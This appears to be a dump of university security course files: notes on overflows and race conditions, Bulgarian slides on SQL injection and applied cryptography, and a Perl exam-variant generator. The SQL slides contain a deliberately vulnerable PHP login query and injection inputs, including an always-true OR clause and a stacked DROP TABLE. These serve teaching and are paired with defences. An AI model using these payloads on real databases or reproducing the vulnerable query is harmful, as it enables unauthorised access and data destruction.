 52 | 
 53 | - What does the attacker do?
 54 | 
 55 | ~~~~
 56 | Unallocated space
 57 | -----------------------
 58 | xA | A | A | A | A | A   x=0x80C03508
 59 |  A | A | A | A | A | A
 60 |  A | A | A | A | A | A
 61 | -----------------------
 62 |  A | A | A | A | A | A
 63 | -----------------------
 64 |  A | A | A | A | A | A
 65 | -----------------------
 66 |     Return Address
 67 | -----------------------
 68 | Parent routine's stack
 69 | ~~~~
 70 | 
 71 | # Stack overflow
 72 | 
 73 | - The actual exploit...
 74 | 
 75 | ~~~~
 76 | Unallocated space
 77 | -----------------------    
 78 | xA | A | A | A | A | A   x=0x80C03508
 79 |  A | A | A | A | A | A
 80 |  A | A | A | A | A | A
 81 | -----------------------
 82 |  A | A | A | A | A | A
 83 | -----------------------
 84 |  A | A | A | A | A | A
 85 | -----------------------
 86 |  \x08 \x35 \xC0 \x80
 87 | -----------------------
 88 | Parent routine's stack
 89 | ~~~~
 90 | 
 91 | 
 92 | # Stack overflow
 93 | 
 94 | - Stack buffer overflow/overrun
 95 | - Deep recursion causing DoS
 96 | 
 97 | ## Protection?
 98 | - Address space layout randomization
 99 | 	+ in order to work you need PIE binaries
100 | - Non-executable stack(requires the NX bit from the CPU)
101 | - PaX (NX emulation and much more)
102 | - Trampolines/StackGuard (gcc)
103 | - StackShield (global return stack table) (gcc)
104 | - Stack Smashing Protection (gcc)
105 | 	+ -fstack-protector/-fstack-protector-all
106 |     + -D_FORTIFY_SOURCE=2
107 | 	+ objdump -d file | grep __stack_chk_fail 
108 | 
109 | # Heap overflow
110 | - What is heap?
111 | 
112 | # Heap overflow
113 | - What is heap?
114 | 	+ the dynamically allocated memory given to an application
115 | 
116 | # Heap overflow
117 | ~~~~
118 | ---------------
119 |  size + status
120 | ---------------   allocated chunk
121 |   ...user...
122 | ---------------				struct chunk {
123 | 								int prev_size;
124 | ---------------					int size;
125 |  size + status					struct chunk *fd;
126 | ---------------					struct chunk *bk;
127 |   forward ptr				};
128 | ---------------
129 |  backward ptr    free chunk
130 | ---------------
131 |   ...free...
132 | ---------------
133 |      size
134 | ~~~~
135 | 
136 | # Heap overflow
137 | 
138 | ## Protections
139 | - HeapShield
140 | - HeapSentry
141 | - -D_FORTIFY_SOURCE=2
142 | - use mprotect() to make your memory READONLY
143 | - Linux Kernel Heap Tampering Detection (only for kernel space)
144 | - Younan malloc
145 | 
146 | # Arithmetic overflow
147 | 
148 | - Integer
149 | - Sign
150 | - Float
151 | 
152 | # Arithmetic overflow
153 | - Integer overflow
154 | 	+ 32bit signed integer range: -2,147,483,648 to 2,147,483,647
155 | 	+ 32bit unsigned integer range: 0 to 4,294,967,295 
156 | 
157 | ~~~~~
158 | signed int m, a, n = 12;
159 | // a is controlled by an attacker
160 | m = n + a;
161 | 
162 | ~~~~~
163 | ## if a is > 2,147,483,635
164 | - What will be the value of m?
165 | - What if the integers are unsigned?
166 | 
167 | ##
168 |  The situation is similar with floats 
169 | 
170 | ##
171 |  Underflow
172 | 
173 | # Arithmetic overflows
174 | 
175 | ## Protections
176 | - Check the size of your values (INT30-C)
177 | - RICH
178 | 
179 | # off-by-one overflows
180 | 
181 | ~~~~
182 | 
183 | int arr[4];
184 | for (i = 0; i OP 5; i++)  {
185 |     /* Body of the loop */
186 | }
187 | ~~~~
188 | 
189 | - What if OP is: <
190 | - What if OP is: <=
191 | 
192 | 
193 | # off-by-one overflows
194 | * Fencepost error
195 | 
196 | ##
197 |  If you build a straight fence 30 meters long with posts spaced 3 meters apart, how many posts do you need?
198 | 
199 | ##
200 | 
201 | ~~~~
202 | ------------------------------------------
203 | | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 |
204 | ------------------------------------------
205 | ~~~~
206 | 
207 | # Return into library
208 | 
209 | - What if you don't have executable stack memory?
210 | 
211 | # Return into library
212 | 
213 | - What if you don't have executable stack memory?
214 | 	+ You still have the libraries the application has loaded..
215 | 	+ Think about unlink() or printf()
216 | 
217 | # Input validation
218 | ## Environment
219 | ## Direct input
220 | 
221 | # Environment
222 | - What is this thing... environment?
223 | - Switch/case based on ENV variable
224 | 	+ (change the control flow of the application)
225 | - Buffer overflow using ENV variable
226 | 	+ (take control over the application or simply crash it)
227 | - Shellshock CVE-2014-6277
228 | - LD_LIBRARY_PATH & LD_PRELOAD
229 | 
230 | 
231 | # Direct Input
232 | - Never trust user input
233 | - User input is
234 | 	+ data received as cmd line parameters
235 | 	+ data recieved from a USER(which may also be API)
236 | 	+ data received from files
237 | 	+ data received from environment
238 | 	+ data received from the network
239 | 	+ user controlled system settings (limits)
240 | - Do not use blacklists... use whitelists instead
241 | - Check the type of the data
242 | - Keep in mind charsets
243 | 
244 | # Race conditions
245 | 
246 | ~~~~
247 | if (access("file", W_OK) != 0) {
248 |    exit(1);
249 | }
250 |  
251 | fd = open("file", O_WRONLY);
252 | write(fd, buffer, sizeof(buffer))
253 | ~~~~
254 | 
255 | ## time of check to time of use (TOCTOU)
256 | 
257 | # Race conditions
258 | - non re-entrent functions (DB, Shared mem, files)
259 | - mutex/futex/spinlock/RCU/fcntl
260 | - acter model (no shared resources architecture)
261 | 
262 | # Timing
263 | 
264 | 
265 | # Information disclosure
266 | 
267 | - path disclosure
268 | - software version disclosure
269 | - user data disclosure (GDPR)
270 | - sensitive data disclosure (usernames and passwords)
271 | - architecture
272 | - logs
273 | 
274 | # Code
275 | 
276 | - remote code execution
277 | - remote code inclusion
278 | - local/remote command execution
279 | - local/remote privilege escalation
280 | 
281 | # SQL injection
282 | 
283 | # Side channels
284 | 
285 | 


--------------------------------------------------------------------------------
/lecture-plans/vk/10sqlinject.pandoc:
--------------------------------------------------------------------------------
  1 | % SQL injection
  2 | % или какво-прави-тая-кавичка-тука
  3 | % Vasil Kolev \<vasil@ludost.net\>
  4 | 
  5 | # SQL injection
  6 | ## SQL
  7 | ### Описание
  8 | 
  9 | * Език за разговори с бази данни
 10 | * SELECT user, password FORM users WHERE username='admin'
 11 | * Почти истински език за програмиране
 12 | 
 13 | <!--
 14 | SQL е език за програмиране, който се използва за комуникация с бази данни. В наши дни основно се генерира от други програми, за да се извлече или работи в/у някаква информация в базата.
 15 | -->
 16 | 
 17 | ### Употреба
 18 | 
 19 | * Почти всички бази данни
 20 |     * MySQL
 21 |     * PostgreSQL
 22 |     * Oracle
 23 |     * Microsoft SQL server
 24 |     * ...
 25 | * От повечето езици за програмиране
 26 | 
 27 | <!--
 28 | Използва се при работата с повечето бази данни, които може да намерите по света и които са наистина бази данни. Има поддръжка за него в някакъв вид и в почти всички програмни езици.
 29 | -->
 30 | 
 31 | ## Атаки
 32 | 
 33 | ### Пример
 34 | 
 35 | ~~~~~~PHP
 36 | # НИКОГА не пишете такъв код
 37 | $user = $_GET['user'];
 38 | $pass = $_GET['pass'];
 39 | 
 40 | $res = mysql_query("SELECT count(*) FROM users "\
 41 | "WHERE username='".$user"' AND pass='".$pass."';");
 42 | ~~~~~~
 43 | 
 44 | <!--
 45 | Ето как да не пишете код. Накратко, взимат се два параметъра и се сипват директно в заявката, която се изпълнява.
 46 | -->
 47 | 
 48 | ### нормално изпълнение
 49 | ~~~~~~PHP
 50 | $user="admin";
 51 | $pass="tmp";
 52 | ~~~~~~
 53 | ~~~~~~SQL
 54 |   SELECT count(*) FROM users
 55 |   WHERE username='admin' AND pass='tmp';
 56 | ~~~~~~
 57 | 
 58 | <!--
 59 | При нормално изпълнение заявката би трябвало да изглежда така, с нормално заместени user и парола.
 60 | -->
 61 | 
 62 | ### по-весело изпълнение
 63 | ~~~~~~PHP
 64 | $user="admin";
 65 | $pass="' OR ''='";
 66 | ~~~~~~
 67 | ~~~~~~SQL
 68 |   SELECT count(*) FROM users 
 69 |   WHERE username='admin' AND pass='' OR ''='';
 70 | ~~~~~~
 71 | 
 72 | <!--
 73 | Може и да е по-забавно - можем да сложим още малко кавички в единия параметър, и заявката се променя, вместо да броя редове, в които има този потребител и парола, то ще избере всички редове в таблицата (с малко допипване може да избере и точно един).
 74 | -->
 75 | 
 76 | ### и леко тъжно такова
 77 | ~~~~~~PHP
 78 | $user="admin";
 79 | $pass="'; DROP table users;\n --";
 80 | ~~~~~~
 81 | ~~~~~~SQL
 82 |   SELECT count(*) FROM users
 83 |   WHERE username='admin' AND pass='tmp';
 84 |   DROP table users;--'
 85 | ~~~~~~
 86 | 
 87 | <!--
 88 | ... или просто може да изтрие таблицата с потребителите.
 89 | -->
 90 | 
 91 | ### little Bobby tables
 92 | ![exploits_of_a_mom](exploits_of_a_mom.png)
 93 | 
 94 | <!--
 95 | Това vulnerability е толкова познато и известно, че даже има комикси
 96 | с него.
 97 | 
 98 | Само да отбележа - примерите по-горе не са съвсем директно работещи, и за всяка база си има специфики на атакуване, при някои работят няколко заявки, разделени с ;, при някои не и т.н., това винаги има нужда да се изтества, ако реализирате истинска атака. (т.е. повече се притесняваме, ако правите некадърни атаки, отколкото ако правите атаки)
 99 | -->
100 | 
101 | ## Защо е възможно
102 | 
103 | ### Как може да има такива неща?
104 | 
105 | * Смесица на два езика с различни правила
106 | * Липса на мисъл за какво има във входните данни
107 | * Специални символи
108 | 
109 | <!--
110 | Това е възможно, понеже реално имаме смесица на два езика с различни правила и реално през някакъв интерфейс създаваме (кофти) програма на другия език. 
111 | 
112 | Също така е възможно, понеже всички символи са равни, но някои са по-равни, съответно никой не очаква, че може да има нещо лошо във входните данни и че може да създаде проблем.
113 | -->
114 | 
115 | ### Специални символи
116 | 
117 | * Единична кавичка '
118 | * Двойна кавичка "
119 | * Коментар --
120 | * Точка и запетая ;
121 | * Нов ред \\n
122 | * backslash \\
123 | 
124 | <!--
125 | Това са в общи линии символите, които могат да създадат проблем.
126 | -->
127 | 
128 | ## Решения
129 | 
130 | ### филтрация
131 | 
132 | * Изтриване на всички съмнителни символи
133 | * Понякога са валидни!
134 | 
135 | <!--
136 | Първия стандартен метод е просто да изтрием символите, които не ни харесват. Това може да свърши работа, ако сме сигурни кои са, и ако знаем, че няма да повредят данните.
137 | -->
138 | ### escape
139 | 
140 | * Най-най-най простото решение:
141 | * Добавяне на \\ пред всички специални символи
142 | 
143 | <!--
144 | Вторият се базира на механизма за escape-ване на символи - т.е. ако подадем на базата \', то ще бъде прието като нормален string и няма да затвори string-а и няма да ни се получи атаката.
145 | -->
146 | 
147 | 
148 | ### защо предните два метода не са добра идея
149 | 
150 | * Защото базата знае по-добре от вас какво трябва да се escape-не/филтрира
151 | * Използвайте нейните функции!
152 | 
153 | ~~~~~~PHP
154 | $user = mysql_real_escape_string($_GET['user'], $c);
155 | $pass = mysql_real_escape_string($_GET['pass'], $c);
156 | 
157 | $res = mysql_query("SELECT count(*) FROM users "\
158 | "WHERE username='".$user"' AND pass='".$pass."';", $c);
159 | ~~~~~~
160 | 
161 | <!--
162 | Предните два метода не са добра идея, понеже е трудно да сме сигурни кои точно символи трябва да се escape-ват и как точно. За целта винаги препоръчваме да използвате стандартните съществуващи функции за целта. Примерът, който съм дал е със старото PHP api, за новото може да прочетете в документацията.
163 | -->
164 | 
165 | ### Prepared statements
166 | 
167 | * Зависи от езика, но:
168 | 
169 | ~~~~~~PHP
170 | $stmt = $c->prepare("SELECT COUNT(*) FROM users \
171 |             WHERE username=:u AND pass=:p");
172 | $stmt->bindParam(':u', $user);
173 | $stmt->bindParam(':p', $pass);
174 | $res = $stmt->execute();
175 | ~~~~~~
176 | 
177 | <!--
178 | Има и друг начин, който е по-труден за объркване - да се използват prepared statements. Идеята е, че може да прекомпилирате заявката, след което само  да и подавате параметри (които са на местата на т.нар. placeholder-и, в случая :p и :u). Така данните не се виждат като части от заявката, а като отделнипараметри и няма начин да изтекат в кода.
179 | 
180 | Това също така ви дава някакво по-добро бързодействие, ако изпълнявате много пъти една такава заявка, просто с различни параметри, понеже компилирането и се случва само веднъж.
181 | -->
182 | 
183 | ### ORM
184 | 
185 | * Object-relation mapping
186 | * В общи линии езика се грижи да ви пише заявките
187 | * Не-особено-гъвкаво, но върши работа
188 | * Дават ви понякога възможност да си пишете сами заявки
189 |     * където може спокойно да се простреляте в крака
190 | * Не escape-ват нещата в order by (по дизайн!)
191 |     * пример http://rails-sqli.org/#order
192 | 
193 | <!--
194 | И метод, който става все по-"модерен" - object-relational mapping, в който просто имате обекти, които са свързани с базата данни и си говорите директно с тях, а framework-а под тях превежда заявките.
195 | 
196 | Разбира се, авторите на ORM-а може да са идиоти и да не са избегнали тези атаки, т.е. да не си проверяват данните и да позволяват SQL injection, но в общия случай по-известните и използвани ORM-и са написани сравнително правилно, съответно не са (особено) опасни.
197 | 
198 | Също така ORM-ите понякога дават възможност да си пишете сами заявките, съответно така може да си напишете сами sql injection по стандартния начин. Освен това, при ORM-ите, които сглабят заявки някои части не се escape-ват, например ORDER BY клаузите (понеже там няма начин ORM-а да знае какво точно вършите).
199 | 
200 | -->
201 | 


--------------------------------------------------------------------------------
/lecture-plans/vk/30crypto.pandoc:
--------------------------------------------------------------------------------
  1 | % Използване на криптография
  2 | % Vasil Kolev \<vasil@ludost.net\>
  3 | 
  4 | # Какво е криптографията
  5 | 
  6 | ## Описание
  7 | ### Какво е криптографията
  8 | 
  9 | > The function of cryptographic protocols is to minimize the amount of trust required.
 10 | 
 11 | *Ferguson, Schneier, Kohno, "Cryptography Engineering"*
 12 | 
 13 | ###
 14 | 
 15 | ![book](cryptoeng.png)
 16 | 
 17 | ## Елементи
 18 | ### Елементи
 19 | 
 20 | * Хешове
 21 | * Симетрични шифри
 22 | * Асиметрични шифри
 23 | * Key Exchange
 24 | * Random генератори
 25 | 
 26 | ### Хешове
 27 | 
 28 | * Hash(data) = H
 29 | * H е с константна дължина
 30 | * data не може да се изведе от H
 31 | * Hash(data) се различава много от Hash(data+1)
 32 | * Примерни функции - MD5, SHA1, SHA256
 33 | 
 34 | ~~~~~~
 35 | ~$ echo asdf |sha1sum
 36 | 7d97e98f8af710c7e7fe703abc8f639e0ee507c4  -
 37 | ~$ echo asdff |sha1sum
 38 | 54d78b0145fd5d04cba4efabcdafc2effc851bea  -
 39 | ~$ echo asdfe|sha1sum
 40 | 800a8015ed4fa1504d5c3c23dfd0209675ccfce6  -
 41 | ~~~~~~
 42 | 
 43 | ### Симетрични шифри
 44 | 
 45 | * Един споделен ключ
 46 | * Функции за криптиране и декриптиране
 47 |      * E_symmetric(K, plaintext) = ciphertext
 48 |      * D_symmetric(K, ciphertext) = plaintext
 49 | 
 50 | * Примерни - AES, DES, Blowfish
 51 | 
 52 | ### Асиметрични шифри
 53 | 
 54 | * Двойка ключове, Kpriv и Kpub
 55 | * Функции за криптиране и декриптиране
 56 |      * E_asymmetric(Kpub, plaintext) = ciphertext
 57 |      * D_asymmetric(Kpriv, ciphertext) = plaintext
 58 | * Криптирането с Kpriv се използва за подпис
 59 | * Примерни - RSA, Elliptic curves
 60 | 
 61 | ### Key exchange
 62 | 
 63 | * Метод за комуникация м/у две страни, при който при подслушване не се разкриват данните, без shared secret.
 64 | * Diffie-Hellman:
 65 |     * Имат избрани 2 прости числа, p и g
 66 |     * Alice изпраща нa Bob A=p^a^ mod g
 67 |     * Bob изпраща на Alice B=p^b^ mod g
 68 |     * Alice изчислява S=B^a^ mod g
 69 |     * Bob изчислява S=А^b^ mod g
 70 |     * Двамата имат S, който е споделен ключ
 71 | 
 72 | ### Random генератори
 73 | 
 74 | * Дава безкраен поток от random данни
 75 | * Не може да се предвиди по това, което е изпратил досега, какво ще връща в бъдеще 
 76 | 
 77 | ## Приложения
 78 | ###
 79 | #### Приложения
 80 | 
 81 | ### Криптиране/декриптиране
 82 | 
 83 | * Пращаме E(K, plaintext), получаваме го и правим D(K, ciphertext)
 84 | * Много рядко се среща в този си вид
 85 | 
 86 | ### Data integrity
 87 | 
 88 | * Хеширане на данните
 89 | 
 90 | ### Съхраняване на пароли
 91 | 
 92 | * Просто hash на паролата
 93 |      * лоша идея, чупи се с rainbow таблици
 94 | * hash със salt
 95 |      * SAVED = SALT + HASH(PASS+SALT)
 96 | * Password-Based Key Derivation Function 2
 97 |      * PBKDF2(Func, Password, Salt, N, dkLen)
 98 | 
 99 | ### Подпис
100 | 
101 | * Криптиран hash на документ
102 |      * Sig=E_symmetric(K, Hash(plaintext))
103 |      * Sig=E_asymmetric(Kpriv, Hash(plaintext))
104 | * Hash с добавка
105 |      * Sig = Hash(data+secret)
106 | 
107 | ### многото приложения на подписа
108 | 
109 | * подпис на документ
110 | * HMAC/integrity check
111 |      * Добавяме в края на пакета Hash(data+secret)
112 | * схеми за stateless token
113 |      * сесии
114 | * Challenge-response auth
115 | 
116 | ## Сигурен канал за комуникация
117 | ###
118 | #### Сигурен канал за комуникация
119 | * Едно от най-използваните приложения (като TLS)
120 | 
121 | ### Какво ни дава
122 | 
123 | * С кого говорим
124 | * Защита от подслушване
125 | * Защита от подмяна на трафика
126 | * Защита от ретроактивно декриптиране
127 | 
128 | ### Компоненти
129 | 
130 | * Взаимна идентификация
131 | * Обмяна на сесийни ключове
132 | * Криптиране и подписване на трафика
133 | * Ясно прекратяване
134 | 
135 | ### Взаимна идентификация
136 | 
137 | * Не е достатъчно да се идентифицирате пред сървъра, нужно е и той пред вас
138 | * Различни схеми, чрез challenge-response, сертификати или споделени тайни
139 | 
140 | ### Обмяна на сесийни ключове
141 | 
142 | * Лоша идея е да се използват shared secrets за цялата комуникация
143 | * Могат да се обменят ключове за по-бърз (симетричен) шифър
144 | * DH key exchange, временни ключове, които после се забравят
145 | * Forward secrecy
146 | 
147 | ### Криптиране и подписване на трафика
148 | 
149 | * Трафикът се криптира, за да не се знае какво има в него
150 | * Трафикът се подписва, за да не може да се подмени
151 | * Има комбинирани системи, като AES-GCM, които правят и двете
152 | 
153 | ### Ясно прекратяване
154 | 
155 | * Трябва да знаете дали сесията е прекъсната нормално или от някой по средата
156 | 
157 | # Софтуерни компоненти
158 | 
159 | ## random генератори
160 | ###
161 | #### Софтуерни компоненти
162 | 
163 | ###
164 | 
165 | > The generation of random numbers is too important to be left to chance.
166 | 
167 | *Robert R. Coveyou*
168 | 
169 | 
170 | ### Random генератори
171 | 
172 | * Използват се за генериране на ключове, nonce-ове, salt-ове...
173 | * Счупения random генератор ви гарантира пробив в сигурността
174 | * Debian openssl vulnerability: https://lwn.net/Articles/282230/
175 | * Ентропия в смисъла на random генератор
176 | 
177 | ### Как изглежда random генератора
178 | 
179 | * State
180 | * функция за вадене на данни и update на state
181 | * зареждане с ентропия в state
182 | * seed за първоначално стартиране
183 | 
184 | ### Съвети
185 | 
186 | * Използвайте системния
187 |      * /dev/random, /dev/urandom, /dev/arandom
188 |      * CryptGenRandom
189 | * Ако не може само него, seed-вайте се от него
190 | * Ако няма системен, помислете много внимателно
191 | 
192 | ## Алгоритми
193 | ### Алгоритми
194 | 
195 | * Не измисляте сами
196 | * just don't.
197 | * Следвайте съществуващите стандарти:
198 |      * AES, AES-GCM, AES-CBC
199 |      * RSA, ECC
200 |      * SHA-1, SHA-3
201 |      * SHA256 се ползва от bitcoin и има твърде много хардуер за чупене
202 | 
203 | ## Системни библиотеки
204 | ### Системни библиотеки
205 | 
206 | * Доколкото можете, използвайте системните библиотеки
207 | * Не пишете сами шифри
208 | 
209 | ## Keychains
210 | ### Keychains
211 | 
212 | * Възможност да съхраняват ключове и други важни неща
213 | * Под контрола на потребителя
214 | * Добра идея
215 | 
216 | # Техники
217 | 
218 | ## Constant runtime
219 | ###
220 | #### Техники
221 | 
222 | ### Constant runtime
223 | 
224 | * За колко време работи нещо е side channel
225 | * Кодът не трябва да отнема различно време в зависимост от данните
226 | 
227 | ### Примерен код
228 | 
229 | * Къде е грешката в следния код:
230 | 
231 | ~~~~~~C
232 | int compare_passwords(char *a, char *b) {
233 | 	for (size_t i=0;a[i]!=0 && b[i]!=0;i++)
234 | 		if (a[i]!=b[i]) return 0;
235 | 
236 | 	return a[i]==b[i];
237 | }
238 | ~~~~~~
239 | 
240 | ### По-правилен constant runtime
241 | 
242 | ~~~~~~C
243 | int compare_passwords(char *a, char *b) {
244 | 	int ret=1;
245 | 	for (size_t i=0;a[i]!=0 && b[i]!=0;i++)
246 | 		ret&=(a[i]==b[i]);
247 | 
248 | 	return ret&(a[i]==b[i]);
249 | }
250 | ~~~~~~
251 | 
252 | ### Съвсем практически пример
253 | 
254 | ~~~~~~C
255 | NUM power(NUM base, NUM exponent) {
256 | 	if (exponent == 0) return NUM(1);
257 | 	if (exponent == 1) return base;
258 | 	if (modulus(exponent, 2)==0) {
259 | 		NUM ret = pow(base, div(exponent, 2));
260 | 		return mult(ret, ret);
261 | 	}
262 | 	/* exponent is not divisible by 2 */
263 | 	NUM ret = pow (base, sub(exponent, 1));
264 | 	return mult(ret, base);
265 | }
266 | ~~~~~~
267 | 
268 | ### Псевдокод на работещия алгоритъм
269 | 
270 | * Montgomery's ladder technique
271 | 
272 | ~~~~~~C
273 | NUM pow(NUM base, NUM exponent) {
274 | 	NUM x1 = base;
275 | 	NUM x2 = mult(base, base);
276 | 	for (int i=BITS(exponent)-2; i>0; i--) {
277 | 		if (BIT(exponent,i)==0) {
278 | 			x2 = mult(x1, x2); x1 = mult(x1, x1);
279 | 		} else {
280 | 			x1 = mult(x1, x2); x2 = mult(x2, x2);
281 | 		}
282 | 	}
283 | 	return x1;
284 | }
285 | ~~~~~~
286 | 
287 | ### Какво да избягваме
288 | 
289 | * if() (т.е. branch-ове в асемблера)
290 | * Деление
291 | * Достъп до адреси в паметта, базирани на данните
292 | * Всякакви други операции с различна скорост спрямо данните
293 | 
294 | ## constant cache usage
295 | ###
296 | #### Constant cache usage
297 | 
298 | ### Constant cache usage
299 | 
300 | ~~~~~~C
301 | #define TABLEN 1000000
302 | int tab[TABLEN]={0, 1, 2, 3 ... , TABLEN-1 };
303 | int process_data(uint8_t *data, size_t len, 
304 | 		uint8_t *output) 
305 | {
306 | 	for (size_t i=0;i<len;i++) {
307 | 		for (j=0;j<data[i];j++) 
308 | 			output[i]+=tab[j*64];
309 | 	}
310 | }
311 | ~~~~~~
312 | 
313 | ### Атака, защита
314 | 
315 | * Друга програма, която пълни кеша и гледа за колко време и идват данните
316 | * Старайте се да стоите в един cache line и да не зависи какво четете от входните данни
317 | 
318 | ## Защита на данните
319 | 
320 | ### Memory locking
321 | 
322 | * Swap
323 | * Не искаме да ни прочетат ключовете
324 | * Ползвайте mlock() и компания
325 | * Не помага при хибернация
326 | 
327 | ### Memory wiping
328 | 
329 | * Почиствайте си паметта
330 |      * free() не е достатъчно
331 | * Cold boot атаки
332 | 
333 | ### Временни файлове
334 | 
335 | * Не използвайте такива за ключове
336 | * Не използвайте такива за plaintext-а
337 | * Ако можете, изобщо не използвайте
338 | 
339 | ### ... защото триенето от диска е сложно
340 | 
341 | * Всеки може да възстанови просто изтрит файл
342 | * Много хора могат да прочетат диск, презаписан с нули
343 | * Някои могат презаписан няколко пъти
344 | * ... без да броим remap-нати сектори, лоши сектори, SSD-та и всякакви други гадости
345 | * Изобщо, дисковете са ви враг
346 | 
347 | # Край
348 | 
349 | ##
350 | 
351 | ### Малко изводи
352 | 
353 | * Криптографията е трудна
354 | * Криптографията е полезна
355 | * Ползвайте я внимателно и четете какво се пише по въпроса
356 | 
357 | ###
358 | #### Въпроси?
359 | 
360 | 
361 | 


--------------------------------------------------------------------------------
/test-generator/generate-test.pl:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/perl
  2 | use strict;
  3 | use warnings;
  4 | use POSIX qw(strftime);
  5 | use DBD::Pg;
  6 | use PDF::Reuse;
  7 | use utf8;
  8 | 
  9 | #
 10 | # ./generate-tests.pl [variant]
 11 | #
 12 | 
 13 | $|=1;
 14 | 
 15 | sub logger {
 16 | 	print 'Error: ' . $_[0] ."\n" if defined($_[0]);
 17 | }
 18 | 
 19 | my $debug = 0;
 20 | my $pguser = 'netsec';
 21 | my $pgpass = '';
 22 | my $pgdb = 'DBI:Pg:database=smal;host=localhost;port=5432';
 23 | my $pgconn = DBI->connect_cached( $pgdb, $pguser, $pgpass, { PrintError => 1, AutoCommit => 1 }) or die("$DBI::errstr\n");
 24 | my $schema = 'public';
 25 | # define which test we are going to generate, first or second
 26 | my $first_test = 1;
 27 | my %ques = ();
 28 | my $qcount = 0;
 29 | my $question_count = 1;
 30 | my $max_questions = 50;
 31 | my $variant = 1;
 32 | $variant = $ARGV[0] if (defined($ARGV[0]) && $ARGV[0] =~ /^[0-9]+$/);
 33 | my $filename = "test1-variant$variant";
 34 | my $first_qid;
 35 | 
 36 | print "Generating test variant $variant\n";
 37 | 
 38 | $pgconn->{pg_enable_utf8}=1;
 39 | # get the total count of questions in the table
 40 | my $get_qcount = $pgconn->prepare(sprintf('SELECT count(*) FROM "%s".questions WHERE %s first_test', $schema, $first_test ? '' : 'NOT' ))
 41 | 	or logger($DBI::errstr);
 42 | $get_qcount->execute() or logger($DBI::errstr);
 43 | $qcount = $get_qcount->fetchrow_array or logger($DBI::errstr);
 44 | if ($first_test) {
 45 | 	$first_qid = $pgconn->prepare(sprintf('SELECT id FROM "%s".questions WHERE first_test ORDER BY id LIMIT 1', $schema ))
 46 | 		or logger($DBI::errstr);
 47 | } else {
 48 | 	$first_qid = $pgconn->prepare(sprintf('SELECT id FROM "%s".questions WHERE NOT first_test ORDER BY id LIMIT 1', $schema ))
 49 | 		or logger($DBI::errstr);
 50 | }
 51 | 
 52 | my $get_question   = $pgconn->prepare(sprintf('SELECT question FROM "%s".questions WHERE id = ? LIMIT 1', $schema))
 53 | 	or logger($DBI::errstr);
 54 | my $right_asnwares = $pgconn->prepare(sprintf('SELECT answer FROM "%s".right_answers WHERE q_id = ?', $schema))
 55 | 	or logger($DBI::errstr);
 56 | my $wrong_asnwares = $pgconn->prepare(sprintf('SELECT answer FROM "%s".wrong_answers WHERE q_id = ?', $schema))
 57 | 	or logger($DBI::errstr);
 58 | 
 59 | # %ques structure
 60 | # key - question id
 61 | # [0] - location of the right answare
 62 | # [1] - [4] - randomly selected right or wrong answare
 63 | # [5] - question text
 64 | # [6] - question id
 65 | my %questions_check = ();
 66 | my %excluded = ();
 67 | 
 68 | my $id_compensation = 1;
 69 | $id_compensation = $first_qid-1 if !$first_test;
 70 | my $id = $id_compensation + int(rand($qcount));
 71 | # generate random question positions
 72 | while ($question_count <= $max_questions) {
 73 | 	print "Num: $question_count" if $debug;
 74 | 	my $rcount = 0;
 75 | 	until (! exists $questions_check{$id} && ! exists $excluded{$id}) {
 76 | 		$id = $id_compensation + int(rand($qcount));
 77 | 		if ($rcount == 350) {
 78 | 			print "Too random\n" if $debug;
 79 | 			last;
 80 | 		}
 81 | 		$rcount++;
 82 | 	}
 83 | 	print " q_id: $id\n" if $debug;
 84 | 	$questions_check{$id} = 1;
 85 | 	$ques{$question_count} = [ -1, -1, -1, -1, -1, -1 ];
 86 | 	$ques{$question_count}[6] = $id;
 87 | 	my $location = 1 + int(rand(4));
 88 | 	$ques{$question_count}[$location] = 66;
 89 | 	$ques{$question_count}[0] = $location;
 90 | 	$question_count++;
 91 | }
 92 | for (sort keys(%ques)) {print "$_ not defined\n" if (!defined($ques{$_}[0]));}
 93 | 
 94 | my $page_count = 1;
 95 | # Starting position on the page(after the answer boxes)
 96 | my $last_line = 666;
 97 | 
 98 | sub page_check {
 99 | 	my $last_pos = $_[0];
100 | 	my $page_count = $_[1];
101 |  	print 'Page: '.${$page_count}.' Line: '.${$last_pos}."\n" if $debug;
102 | 	${$last_pos} -= 16;
103 | 	if (${$last_pos} < 40) {
104 | 		if (${$page_count} == 1) {
105 | 			prAdd("0.0 0.0 0.0 RG\n");
106 | 			prAdd("9.0 9.0 9.0 rg\n");
107 | 			for my $l (1..25) {
108 | 				my $pos = ($l * 18) + 20;
109 | 				prAdd("$pos 711 18 20 re\n");
110 | 				prAdd("$pos 676 18 20 re\n");
111 | 			}
112 | 			prAdd("B\n");
113 | 		}
114 | 
115 | 		${$last_pos} = 780;
116 | 		prPage();
117 | 		${$page_count}++;
118 | 		prText(520,800,'Page '.${$page_count});
119 | 	}
120 | }
121 | 
122 | prFile("$filename.pdf");
123 | prTTFont('/usr/share/fonts/arial.ttf');
124 | prText(35,800,"Linux System & Network Administration");
125 | prText(340,800,"TEST 1   2015");
126 | prText(532,800,"Page $page_count");
127 | prText(35,780,"Name: ______________________________________________________________________");
128 | prText(35,760,"SoftUni username: ______________________________");
129 | prText(510,760,"  Variant: $variant");
130 | for my $l (1..25) {
131 | 	my $pos = ($l * 18) + 24;
132 | 	if ($l > 9) {
133 | 		$pos = ($l * 18) + 22;
134 | 	}
135 | 	prText($pos,734,$l);
136 | 	prText($pos-1,699,$l+25);
137 | }
138 | 
139 | prFontSize('10');
140 | 
141 | # populate the questions
142 | my $tcount = 1;
143 | for (1..$max_questions) {
144 | 	my $qid = $_;
145 | 	next if ($ques{$qid}[6] !~ /^[0-9]+$/);
146 | # get the question
147 | 	$get_question->execute($ques{$qid}[6]) or logger($DBI::errstr);
148 | 	my $question = $get_question->fetchrow_array or logger($DBI::errstr);
149 | 	print 'Get question: (' . $ques{$qid}[6] . ') ' . $question . "\n" if $debug;
150 | # get all right answares
151 | 	$right_asnwares->execute($ques{$qid}[6]) or logger($DBI::errstr);
152 | 	my @answares = ();
153 | 	my $entry_count=0;
154 | 	while(my $data = $right_asnwares->fetchrow_array) {
155 | 		$answares[$entry_count] = $data;
156 | 		$entry_count++;
157 | 	}
158 | 
159 | # get all wrong answares
160 | 	$wrong_asnwares->execute($ques{$qid}[6]) or logger($DBI::errstr);
161 | 	my @mistakes = ();
162 | 	$entry_count = 0;
163 | # copy them into an array
164 | 	while (my @data = $wrong_asnwares->fetchrow_array) {
165 | 		$mistakes[$entry_count] = $data[0];
166 | 		$entry_count++;
167 | 	}
168 | 
